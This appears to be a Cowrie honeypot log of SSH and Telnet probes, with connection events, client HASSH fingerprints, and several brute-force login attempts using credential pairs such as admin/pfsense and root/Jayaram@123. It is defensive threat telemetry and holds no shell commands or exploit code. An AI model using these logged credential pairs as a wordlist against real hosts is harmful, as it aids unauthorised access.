{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T01:12:54.237209Z","src_ip":"66.240.236.116","session":"ad6f9a76d3f1"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:13:04.105288Z","src_ip":"66.240.236.116","session":"ad6f9a76d3f1"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":42262,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4168e37300f","protocol":"ssh","message":"New connection: 27.112.78.170:42262 (1.2.3.4:22) [session: c4168e37300f]","sensor":"my-vps","timestamp":"2025-08-26T01:13:47.811535Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:13:47.813016Z","src_ip":"27.112.78.170","session":"c4168e37300f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:13:48.092794Z","src_ip":"27.112.78.170","session":"c4168e37300f"}
{"eventid":"cowrie.login.failed","username":"user5","password":"123456","message":"login attempt [user5/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T01:13:49.192708Z","src_ip":"27.112.78.170","session":"c4168e37300f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53212,"dst_ip":"1.2.3.4","dst_port":23,"session":"33bc1221ecd0","protocol":"telnet","message":"New connection: 212.227.125.160:53212 (1.2.3.4:23) [session: 33bc1221ecd0]","sensor":"my-vps","timestamp":"2025-08-26T01:13:50.382355Z"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:13:50.464369Z","src_ip":"27.112.78.170","session":"c4168e37300f"}
{"eventid":"cowrie.session.closed","duration":7.834686994552612,"message":"Connection lost after 7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:13:58.216974Z","src_ip":"212.227.125.160","session":"33bc1221ecd0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58314,"dst_ip":"1.2.3.4","dst_port":22,"session":"349abba259d6","protocol":"ssh","message":"New connection: 212.227.235.229:58314 (1.2.3.4:22) [session: 349abba259d6]","sensor":"my-vps","timestamp":"2025-08-26T01:14:54.869763Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:14:55.687557Z","src_ip":"212.227.235.229","session":"349abba259d6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T01:14:55.688284Z","src_ip":"212.227.235.229","session":"349abba259d6"}
{"eventid":"cowrie.login.success","username":"root","password":"mayank@12345","message":"login attempt [root/mayank@12345] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:14:59.633084Z","src_ip":"212.227.235.229","session":"349abba259d6"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:15:00.300626Z","src_ip":"212.227.235.229","session":"349abba259d6"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":51720,"dst_ip":"1.2.3.4","dst_port":22,"session":"640630f69a30","protocol":"ssh","message":"New connection: 27.112.78.170:51720 (1.2.3.4:22) [session: 640630f69a30]","sensor":"my-vps","timestamp":"2025-08-26T01:15:17.450220Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:15:17.451229Z","src_ip":"27.112.78.170","session":"640630f69a30"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:15:17.725424Z","src_ip":"27.112.78.170","session":"640630f69a30"}
{"eventid":"cowrie.login.failed","username":"qbtuser","password":"123456","message":"login attempt [qbtuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T01:15:18.860570Z","src_ip":"27.112.78.170","session":"640630f69a30"}
{"eventid":"cowrie.session.connect","src_ip":"206.189.224.163","src_port":6102,"dst_ip":"1.2.3.4","dst_port":22,"session":"75eaae54a4cd","protocol":"ssh","message":"New connection: 206.189.224.163:6102 (1.2.3.4:22) [session: 75eaae54a4cd]","sensor":"my-vps","timestamp":"2025-08-26T01:15:19.537222Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-26T01:15:19.633662Z","src_ip":"206.189.224.163","session":"75eaae54a4cd"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-26T01:15:19.731639Z","src_ip":"206.189.224.163","session":"75eaae54a4cd"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:15:20.135956Z","src_ip":"27.112.78.170","session":"640630f69a30"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-26T01:15:22.709024Z","src_ip":"206.189.224.163","session":"75eaae54a4cd"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:15:22.710443Z","src_ip":"206.189.224.163","session":"75eaae54a4cd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43755,"dst_ip":"1.2.3.4","dst_port":23,"session":"27762315ec02","protocol":"telnet","message":"New connection: 212.227.125.160:43755 (1.2.3.4:23) [session: 27762315ec02]","sensor":"my-vps","timestamp":"2025-08-26T01:15:26.515620Z"}
{"eventid":"cowrie.session.closed","duration":31.413094520568848,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:15:57.927052Z","src_ip":"212.227.125.160","session":"27762315ec02"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35776,"dst_ip":"1.2.3.4","dst_port":22,"session":"717a8f578fed","protocol":"ssh","message":"New connection: 212.227.235.229:35776 (1.2.3.4:22) [session: 717a8f578fed]","sensor":"my-vps","timestamp":"2025-08-26T01:16:18.498163Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:16:18.499135Z","src_ip":"212.227.235.229","session":"717a8f578fed"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:16:18.747858Z","src_ip":"212.227.235.229","session":"717a8f578fed"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62584,"dst_ip":"1.2.3.4","dst_port":22,"session":"446e0e3ca736","protocol":"ssh","message":"New connection: 217.72.205.35:62584 (1.2.3.4:22) [session: 446e0e3ca736]","sensor":"my-vps","timestamp":"2025-08-26T01:16:22.250520Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:16:22.251659Z","src_ip":"217.72.205.35","session":"446e0e3ca736"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59254,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd691584dbc7","protocol":"ssh","message":"New connection: 212.227.235.229:59254 (1.2.3.4:22) [session: fd691584dbc7]","sensor":"my-vps","timestamp":"2025-08-26T01:16:24.635329Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:16:25.168965Z","src_ip":"212.227.235.229","session":"fd691584dbc7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T01:16:25.169880Z","src_ip":"212.227.235.229","session":"fd691584dbc7"}
{"eventid":"cowrie.login.success","username":"root","password":"Jayaram@123","message":"login attempt [root/Jayaram@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:16:27.681670Z","src_ip":"212.227.235.229","session":"fd691584dbc7"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:16:28.327244Z","src_ip":"212.227.235.229","session":"fd691584dbc7"}
{"eventid":"cowrie.session.connect","src_ip":"222.98.187.3","src_port":59999,"dst_ip":"1.2.3.4","dst_port":23,"session":"c428fbc0b1e5","protocol":"telnet","message":"New connection: 222.98.187.3:59999 (1.2.3.4:23) [session: c428fbc0b1e5]","sensor":"my-vps","timestamp":"2025-08-26T01:16:37.396493Z"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":52332,"dst_ip":"1.2.3.4","dst_port":22,"session":"b56a03a82f99","protocol":"ssh","message":"New connection: 27.112.78.170:52332 (1.2.3.4:22) [session: b56a03a82f99]","sensor":"my-vps","timestamp":"2025-08-26T01:16:47.318076Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:16:47.320240Z","src_ip":"27.112.78.170","session":"b56a03a82f99"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:16:47.586823Z","src_ip":"27.112.78.170","session":"b56a03a82f99"}
{"eventid":"cowrie.login.failed","username":"jon","password":"jon","message":"login attempt [jon/jon] failed","sensor":"my-vps","timestamp":"2025-08-26T01:16:48.693676Z","src_ip":"27.112.78.170","session":"b56a03a82f99"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:16:49.963284Z","src_ip":"27.112.78.170","session":"b56a03a82f99"}
{"eventid":"cowrie.session.closed","duration":39.741610050201416,"message":"Connection lost after 39 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:17:17.138032Z","src_ip":"222.98.187.3","session":"c428fbc0b1e5"}
{"eventid":"cowrie.session.connect","src_ip":"98.122.233.246","src_port":44662,"dst_ip":"1.2.3.4","dst_port":23,"session":"44c15af356a9","protocol":"telnet","message":"New connection: 98.122.233.246:44662 (1.2.3.4:23) [session: 44c15af356a9]","sensor":"my-vps","timestamp":"2025-08-26T01:17:32.623903Z"}
{"eventid":"cowrie.session.closed","duration":12.292915344238281,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:17:44.916747Z","src_ip":"98.122.233.246","session":"44c15af356a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45518,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e95eac73397","protocol":"ssh","message":"New connection: 212.227.235.229:45518 (1.2.3.4:22) [session: 7e95eac73397]","sensor":"my-vps","timestamp":"2025-08-26T01:18:09.599289Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T01:18:09.602637Z","src_ip":"212.227.235.229","session":"7e95eac73397"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T01:18:09.727396Z","src_ip":"212.227.235.229","session":"7e95eac73397"}
{"eventid":"cowrie.login.failed","username":"admin","password":"pfsense","message":"login attempt [admin/pfsense] failed","sensor":"my-vps","timestamp":"2025-08-26T01:18:10.281234Z","src_ip":"212.227.235.229","session":"7e95eac73397"}
{"eventid":"cowrie.login.failed","username":"admin","password":"4dm1n","message":"login attempt [admin/4dm1n] failed","sensor":"my-vps","timestamp":"2025-08-26T01:18:11.408721Z","src_ip":"212.227.235.229","session":"7e95eac73397"}
{"eventid":"cowrie.login.failed","username":"admin","password":"Aa123456","message":"login attempt [admin/Aa123456] failed","sensor":"my-vps","timestamp":"2025-08-26T01:18:12.536368Z","src_ip":"212.227.235.229","session":"7e95eac73397"}
